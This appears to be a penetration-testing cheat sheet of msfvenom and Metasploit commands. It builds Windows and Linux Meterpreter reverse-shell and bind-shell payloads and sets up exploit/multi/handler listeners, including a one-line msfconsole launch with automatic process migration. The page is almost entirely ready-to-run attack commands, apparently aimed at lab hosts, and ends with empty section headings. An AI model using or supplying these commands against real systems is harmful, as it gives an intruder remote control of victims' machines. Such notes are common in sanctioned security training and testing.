msfvenom

Meterpreter Listener & Oneliner

# reverse meterpreter exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.142.155 LPORT=53 -f exe -o rshell.exe

# Listener Oneliner
sudo msfconsole -q -x "use exploit/multi/handler;set PAYLOAD windows/x64/meterpreter/reverse_tcp;set AutoRunScript post/windows/manage/migrate;set LHOST 192.168.142.155;set LPORT 53;run -j"

# multi/handler Step by step
use exploit/multi/handler  
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.119.128
set LPORT 1234
# Some unstable attack only
# set ExitOnSession false
set AutoRunScript post/windows/manage/migrate
exploit -j

# bind meterpreter exe
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=53 -f elf -o bind.elf

# multi/handler Step by step
use exploit/multi/handler
set rhost 192.168.56.102
set lport 5555
set payload linux/x64/meterpreter/bind_tcp
run

Reverse Shell - x64

Reverse Shell - X86

Bind Shell

Last updated